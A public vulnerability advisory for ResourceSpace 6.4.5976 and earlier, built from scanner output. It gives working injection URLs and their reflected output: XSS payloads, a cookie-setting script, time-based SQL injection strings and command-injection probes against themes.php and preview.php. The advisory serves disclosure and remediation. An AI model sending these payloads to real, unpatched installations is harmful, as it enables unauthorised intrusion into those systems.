655 lines
No EOL
22 KiB
Text
655 lines
No EOL
22 KiB
Text
Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
|
||
Injection Vulnerabilities
|
||
|
||
Author: Adler Freiheit
|
||
Discovered: 11 June 2014
|
||
Updated: 11 December 2014
|
||
Published: 11 December 2014
|
||
Vendor: Montala Limited
|
||
Vendor url: www.resourcespace.org
|
||
Software: ResourceSpace Digital Asset Management Software
|
||
Versions: 6.4.5976 and prior
|
||
Status: Unpatched
|
||
Vulnerable scripts:
|
||
/pages/themes.php
|
||
/pages/preview.php
|
||
/pages/help.php
|
||
/pages/search.php
|
||
/pages/user_password.php
|
||
/pages/user_request.php
|
||
(and probably others)
|
||
|
||
Description:
|
||
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL
|
||
injection attacks, and insecure cookie handling. The scripts fail to
|
||
properly sanitize user-supplied input, check the network protocol used
|
||
to access the site.
|
||
|
||
Vulnerability: SC1414
|
||
Name: Cross Site Scripting (XSS)
|
||
Type: Application
|
||
Asset Group: Multiple
|
||
Source: SureCloud
|
||
IP Address:
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 6 Oct 2014
|
||
Service: tcp/https:443
|
||
Severity: 4
|
||
Risk: 40
|
||
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
|
||
Resolution Effort: 3
|
||
|
||
Description:
|
||
This web application is vulnerable to Cross Site Scripting (XSS).
|
||
XSS is caused when an application echoes user controllable input data
|
||
back to the browser without first sanitising or escaping dangerous
|
||
characters. Unescaped strings are then interpreted or executed by the
|
||
browser as script, just as if they had originated from the web server.
|
||
Malicious script is sent by the attacker via the vulnerable web
|
||
application and executed on the victims browser, within the context of
|
||
that user and may be used to steal session information, redirect users
|
||
to a malicious site, and even steal credentials in a Phishing attack.
|
||
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
|
||
http://cwe.mitre.org/data/definitions/79.html
|
||
|
||
Solution:
|
||
Validate all user controllable input data (hidden fields, URL
|
||
parameters, Cookie values, HTTP headers etc) against expected Type,
|
||
Length and where possible, Format and Range characteristics. Reject
|
||
any data that fails validation.
|
||
Sanitise all user controllable input data (hidden fields, URL
|
||
parameters, Cookie values, HTTP headers etc) by converting potentially
|
||
dangerous characters (listed below) into HTML entities such as > < etc
|
||
using output encoding.
|
||
By combining proper input validation with effective input sanitisation
|
||
and output encoding, Cross Site Scripting vulnerabilities will be
|
||
mitigated.
|
||
[1] <> (triangular parenthesis)
|
||
[2] " (quotation mark)
|
||
[3] ' (single apostrophe)
|
||
[4] % (percent sign)
|
||
[5] ; (semicolon)
|
||
[6] () (parenthesis)
|
||
[7] & (ampersand sign)
|
||
[8] + (plus sign)
|
||
[9] / (forward slash)
|
||
[10] | (pipe)
|
||
[11] [] (square brackets)
|
||
[12] : (colon)
|
||
|
||
Information
|
||
URI: /pages/preview.php
|
||
Parameter: sort (GET)
|
||
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>
|
||
|
||
Vulnerability: 44967
|
||
Name: CGI Generic Command Execution (timebased)
|
||
Type: CGI abuses
|
||
Asset Group: Multiple
|
||
Source: SureCloud Vulnerability Scan
|
||
IP Address
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 11 Nov 2014
|
||
Service: tcp/www:443
|
||
Severity: 4
|
||
Risk: 40
|
||
CVSS Base Score: 7.5
|
||
|
||
Description:
|
||
The remote web server hosts CGI scripts that fail to adequately
|
||
sanitize request strings. By leveraging this issue, an attacker may be
|
||
able to execute arbitrary commands on the remote host.
|
||
Note that this script uses a timebased detection method which is less
|
||
reliable than the basic method.
|
||
|
||
Solution:
|
||
Restrict access to the vulnerable application. Contact the
|
||
vendor for a patch or upgrade.
|
||
|
||
Information:
|
||
Using the GET HTTP method, Nessus found that:
|
||
|
||
+ The following resources may be vulnerable to arbitrary command
|
||
execution (time based) :
|
||
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
|
||
|
||
/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
|
||
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
|
||
/pages/themes.php?lastlevelchange=%26%20ping%20n%203%20127.0.0.1%20%26
|
||
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20n%203%20127.0.0.1%20%26
|
||
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20n%203%20127.0.0.1%20%26
|
||
/pages/themes.php?lastlevelchange=%7C%20ping%20n%203%20127.0.0.1%20%7C
|
||
|
||
References:
|
||
CWE: 20
|
||
CWE: 713
|
||
CWE: 722
|
||
CWE: 727
|
||
CWE: 74
|
||
CWE: 77
|
||
CWE: 78
|
||
|
||
–-----------------------------------------------------------------------------------------------------
|
||
Vulnerability: 43160
|
||
Name: CGI Generic SQL Injection (blind, time based)
|
||
Type: CGI abuses
|
||
Asset Group: Multiple
|
||
Source: SureCloud Vulnerability Scan
|
||
IP Address:
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 11 Nov 2014
|
||
Service: tcp/www:443
|
||
Severity: 4
|
||
Risk: 40
|
||
CVSS Base Score: 7.5
|
||
|
||
Description
|
||
By sending specially crafted parameters to one or more CGI scripts
|
||
hosted on the remote web server, Nessus was able to get a slower
|
||
response, which suggests that it may have been able to modify the
|
||
behavior of the application and directly access the underlying
|
||
database.
|
||
An attacker may be able to exploit this issue to bypass
|
||
authentication, read confidential data, modify the remote database, or
|
||
even take control of the remote operating system.
|
||
Note that this script is experimental and may be prone to false positives.
|
||
|
||
Solution:
|
||
Modify the affected CGI scripts so that they properly escape arguments.
|
||
|
||
Information:
|
||
Using the GET HTTP method, Nessus found that :
|
||
+ The following resources may be vulnerable to blind SQL injection
|
||
(time based) :
|
||
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
|
||
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
|
||
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20%20
|
||
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
|
||
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
|
||
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
|
||
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
|
||
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
|
||
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);
|
||
|
||
Clicking directly on these URLs should exhibit the issue :
|
||
(you will probably need to read the HTML source)
|
||
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
|
||
|
||
References
|
||
CWE: 20
|
||
CWE: 713
|
||
CWE: 722
|
||
CWE: 727
|
||
CWE: 751
|
||
CWE: 77
|
||
CWE: 801
|
||
CWE: 810
|
||
CWE: 89
|
||
|
||
–---------------------------------------------------------------------------------------------------------------
|
||
|
||
Vulnerability: 55903
|
||
Name: CGI Generic XSS (extended patterns)
|
||
Type: CGI abuses : XSS
|
||
Asset Group: Multiple
|
||
Source: SureCloud Vulnerability Scan
|
||
IP Address:
|
||
Status: Open
|
||
Hostname
|
||
Last Seen: 11 Nov 2014
|
||
Service: tcp/www:443
|
||
Severity: 3
|
||
Risk: 30
|
||
CVSS Base Score: 4.3
|
||
|
||
Description
|
||
The remote web server hosts one or more CGI scripts that fail to
|
||
adequately sanitize request strings with malicious JavaScript. By
|
||
leveraging this issue, an attacker may be able to cause arbitrary HTML
|
||
and script code to be executed in a user's browser within the security
|
||
context of the affected site. These XSS vulnerabilities are likely to
|
||
be 'nonpersistent' or 'reflected'.
|
||
|
||
Solution
|
||
Restrict access to the vulnerable application. Contact the vendor for
|
||
a patch or upgrade.
|
||
|
||
Information
|
||
Using the GET HTTP method, Nessus found that :
|
||
+ The following resources may be vulnerable to crosssite scripting+
|
||
The 'sort' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=504%20onerror="alert(504);
|
||
output
|
||
(extended patterns) :
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||
a>
|
||
|
||
/pages/preview.php?sort=&sort=504%20onerror="alert(504);
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||
a>
|
||
|
||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?order_by=504%20onerror="alert(504);
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
|
||
ew</a>
|
||
|
||
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
|
||
ew</a>
|
||
|
||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&fro
|
||
m=
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||
a>
|
||
|
||
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b
|
||
y=&from=
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
|
||
a>
|
||
|
||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&fro
|
||
m=
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
|
||
Tonbridge & Malling Borough Council
|
||
Vulnerabilities Report | 5
|
||
a>
|
||
|
||
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert
|
||
(504);&from=
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=504 o
|
||
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
|
||
a>
|
||
|
||
Clicking directly on these URLs should exhibit the issue :
|
||
(you will probably need to read the HTML source)
|
||
/pages/preview.php?sort=504%20onerror="alert(504);
|
||
/pages/preview.php?order_by=504%20onerror="alert(504);
|
||
References
|
||
CWE: 116
|
||
CWE: 20
|
||
CWE: 442
|
||
CWE: 692
|
||
CWE: 712
|
||
CWE: 722
|
||
CWE: 725
|
||
CWE: 74
|
||
CWE: 751
|
||
CWE: 79
|
||
CWE: 80
|
||
CWE: 801
|
||
CWE: 81
|
||
CWE: 811
|
||
CWE: 83
|
||
CWE: 86
|
||
|
||
–----------------------------------------------------------------------------------------------------
|
||
|
||
Vulnerability: 49067
|
||
Name: CGI Generic HTML Injections (quick test)
|
||
Type: CGI abuses : XSS
|
||
Asset Group: Multiple
|
||
Source: SureCloud Vulnerability Scan
|
||
IP Address:
|
||
Status: Open
|
||
Hostname
|
||
Last Seen: 11 Nov 2014
|
||
Service: tcp/www:443
|
||
Severity: 3
|
||
Risk: 30
|
||
CVSS Base Score: 5.0
|
||
|
||
Description
|
||
The remote web server hosts CGI scripts that fail to adequately sanitize
|
||
request strings with malicious JavaScript. By leveraging this issue,
|
||
an attacker may be able to cause arbitrary HTML to be executed
|
||
inuser's browser within the security context of the affected site.
|
||
The remote web server may be vulnerable to IFRAME injections or
|
||
crosssite scripting attacks :
|
||
IFRAME injections allow 'virtual defacement' that
|
||
might scare or anger gullible users. Such injections
|
||
are sometimes implemented for 'phishing' attacks.
|
||
XSS are extensively tested by four other scripts.
|
||
Some applications (e.g. web forums) authorize a subset
|
||
of HTML without any ill effect. In this case, ignore
|
||
this warning.
|
||
|
||
Solution
|
||
Either restrict access to the vulnerable application or contact the
|
||
vendor for an update.
|
||
|
||
Information
|
||
Using the GET HTTP method, Nessus found that :
|
||
+ The following resources may be vulnerable to HTML injection :
|
||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=<"jfunqd%20>
|
||
output
|
||
a
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=<"jfunqd >&archive=&k=">< Back to resource view</a>
|
||
|
||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?order_by=<"jfunqd%20>
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
|
||
nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
|
||
|
||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=<"jfunqd >&archive=&k=">< Back to resource view</a>
|
||
|
||
+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
|
||
nqd >&sort=&archive=&k=">< Back to resource view</a>
|
||
|
||
Clicking directly on these URLs should exhibit the issue :
|
||
(you will probably need to read the HTML source)
|
||
/pages/preview.php?sort=<"jfunqd%20>
|
||
/pages/preview.php?order_by=<"jfunqd%20>
|
||
|
||
References
|
||
CWE: 80
|
||
CWE: 86
|
||
|
||
–---------------------------------------------------------------------------------------------------
|
||
Vulnerability: SC1628
|
||
Name: SSL cookie without secure flag set
|
||
Type: Web Servers
|
||
Asset Group: Multiple
|
||
Source: SureCloud
|
||
IP Address:
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 12 Nov 2014
|
||
Service: tcp/https:443
|
||
Severity: 3
|
||
Risk: 30
|
||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||
|
||
Resolution Effort: 1
|
||
Description
|
||
If the secure flag is not set, then the cookie will be transmitted in
|
||
cleartext if the user visits any non SSL
|
||
(HTTP) URLs within the cookie's scope.
|
||
Solution
|
||
The secure flag should be set on all cookies that are used for
|
||
transmitting sensitive data when accessing
|
||
content over HTTPS.
|
||
If cookies are used to transmit session tokens, then areas of the
|
||
application that are accessed over HTTPS
|
||
should employ their own session handling mechanism, and the session
|
||
tokens used should never be
|
||
transmitted over unencrypted communications.
|
||
Information
|
||
|
||
URI: /pages/help.php
|
||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
|
||
URI: /pages/search.php
|
||
Other Info: display=thumbs; httponly
|
||
URI: /pages/themes.php
|
||
Other Info: saved_themes_order_by=name; httponly
|
||
URI: /pages/user_password.php
|
||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:08 GMT; httponly
|
||
URI: /pages/user_password.php
|
||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:30 GMT; httponly
|
||
URI: /pages/user_request.php
|
||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:07 GMT; httponly
|
||
URI: /pages/user_request.php
|
||
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:25 GMT; httponly
|
||
|
||
–-------------------------------------------------------------------------------
|
||
|
||
Vulnerability: 44136
|
||
Name: CGI Generic Cookie Injection Scripting
|
||
Type: CGI abuses
|
||
Asset Group: Multiple
|
||
Source: SureCloud Vulnerability Scan
|
||
IP Address:
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 11 Nov 2014
|
||
Service: tcp/www:443
|
||
Severity: 3
|
||
Risk: 30
|
||
CVSS Base Score: 5.0
|
||
|
||
Description
|
||
The remote web server hosts at least one CGI script that fails to
|
||
adequately sanitize request strings with malicious JavaScript.
|
||
By leveraging this issue, an attacker may be able to inject arbitrary
|
||
cookies. Depending on the structure of the web application, it may be
|
||
possible to launch a 'session fixation' attack using this mechanism.
|
||
Please note that :
|
||
Nessus did not check if the session fixation attack is
|
||
feasible.
|
||
This is not the only vector of session fixation.
|
||
|
||
Solution
|
||
Restrict access to the vulnerable application. Contact the vendor
|
||
for a patch or upgrade.
|
||
|
||
Information
|
||
Using the GET HTTP method, Nessus found that :
|
||
+ The following resources may be vulnerable to cookie manipulation :
|
||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script
|
||
>
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
|
||
p;Back to resource view</a>
|
||
|
||
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</
|
||
script>
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
|
||
p;Back to resource view</a>
|
||
|
||
References
|
||
CWE: 472
|
||
CWE: 642
|
||
CWE: 715
|
||
CWE: 722
|
||
|
||
–--------------------------------------------------------------------------------------------
|
||
|
||
Vulnerability: 39466
|
||
Name: CGI Generic XSS (quick test)
|
||
Type: CGI abuses : XSS
|
||
Asset Group: Multiple
|
||
Source: SureCloud Vulnerability Scan
|
||
IP Address:
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 11 Nov 2014
|
||
Service: tcp/www:443
|
||
Severity: 3
|
||
Risk: 30
|
||
CVSS Base Score: 5.0
|
||
|
||
Description
|
||
The remote web server hosts CGI scripts that fail to adequately sanitize
|
||
request strings with malicious JavaScript. By leveraging this issue,
|
||
an attacker may be able to cause arbitrary HTML and script code
|
||
to be executed in a user's browser within the security context of the
|
||
affected site.
|
||
These XSS are likely to be 'non persistent' or 'reflected'.
|
||
Solution
|
||
Restrict access to the vulnerable application. Contact the vendor
|
||
for a patch or upgrade.
|
||
|
||
Information
|
||
Using the GET HTTP method, Nessus found that :
|
||
+ The following resources may be vulnerable to crosssite scripting
|
||
(quick+ The 'order_by' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
|
||
output
|
||
test) :
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=<IMG
|
||
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
|
||
esource view</a>
|
||
|
||
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);
|
||
">
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=<IMG
|
||
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
|
||
esource view</a>
|
||
|
||
+ The 'sort' parameter of the /pages/preview.php CGI :
|
||
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
|
||
rce view</a>
|
||
|
||
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
|
||
output
|
||
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
|
||
/pages/view.php?ref=&search=&offset=&order_by=&sort
|
||
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
|
||
rce view</a>
|
||
|
||
|
||
References
|
||
CWE: 116
|
||
CWE: 20
|
||
CWE: 442
|
||
CWE: 692
|
||
CWE: 712
|
||
CWE: 722
|
||
CWE: 725
|
||
CWE: 74
|
||
CWE: 751
|
||
CWE: 79
|
||
CWE: 80
|
||
CWE: 801
|
||
CWE: 81
|
||
CWE: 811
|
||
CWE: 83
|
||
CWE: 86
|
||
|
||
–--------------------------------------------------------------------------------------------------------------
|
||
|
||
Also issues to be aware of:
|
||
|
||
Vulnerability: SC1629
|
||
Name: Cookie without HttpOnly flag set
|
||
Type: Web Servers
|
||
Asset Group: Multiple
|
||
Source: SureCloud
|
||
IP Address:
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 12 Nov 2014
|
||
Service: tcp/https:443
|
||
Severity: 3
|
||
Risk: 30
|
||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||
Resolution Effort: 1
|
||
Description
|
||
When the HttpOnly attribute is set on a cookie, then the cookies
|
||
value cannot be read or set by clientside
|
||
JavaScript.
|
||
HttpOnly prevent certain clientside attacks, such as Cross Site
|
||
Scripting (XSS), from capturing the cookies
|
||
value via an injected script. When HttpOnly is set, script access to
|
||
document.cookie results in a blank string
|
||
being returned.
|
||
Solution
|
||
HttpOnly can safely be set for all Cookie values, unless the
|
||
application has a specific need for Script access
|
||
to cookie contents (which is highly unusual).
|
||
Please note also that HttpOnly does not mitigate against all dangers
|
||
of Cross Site Scripting any XSS
|
||
vulnerabilities identified must still be fixed.
|
||
Information
|
||
URI: /pages/help.php
|
||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
|
||
|
||
–-------------------------------------------------------------------------------
|
||
|
||
Vulnerability: SC1629
|
||
Name: Cookie without HttpOnly flag set
|
||
Type: Web Servers
|
||
Asset Group: Multiple
|
||
Source: SureCloud
|
||
IP Address:
|
||
Status: Open
|
||
Hostname:
|
||
Last Seen: 12 Nov 2014
|
||
Service: tcp/http:80
|
||
Severity: 3
|
||
Risk: 30
|
||
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
|
||
Resolution Effort: 1
|
||
|
||
Description
|
||
When the HttpOnly attribute is set on a cookie, then the cookies
|
||
value cannot be read or set by clientside JavaScript.
|
||
HttpOnly prevent certain clientside attacks, such as Cross Site
|
||
Scripting (XSS), from capturing the cookies value via an injected
|
||
script. When HttpOnly is set, script access to document.cookie results
|
||
in a blank string being returned.
|
||
|
||
Solution
|
||
HttpOnly can safely be set for all Cookie values, unless the
|
||
application has a specific need for Script access
|
||
to cookie contents (which is highly unusual).
|
||
Please note also that HttpOnly does not mitigate against all dangers
|
||
of Cross Site Scripting any XSS vulnerabilities identified must
|
||
still be fixed.
|
||
|
||
Information
|
||
URI: /pages/collection_share.php
|
||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:42 GMT
|
||
URI: /pages/contactsheet_settings.php
|
||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:38 GMT
|
||
URI: /pages/help.php
|
||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:05 GMT
|
||
URI: /pages/preview.php
|
||
Other Info: thumbs=hide; expires=Tue, 08Aug2017 01:57:55 GMT
|
||
URI: /pages/resource_email.php
|
||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:42 GMT
|
||
URI: /pages/view.php
|
||
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:45 GMT |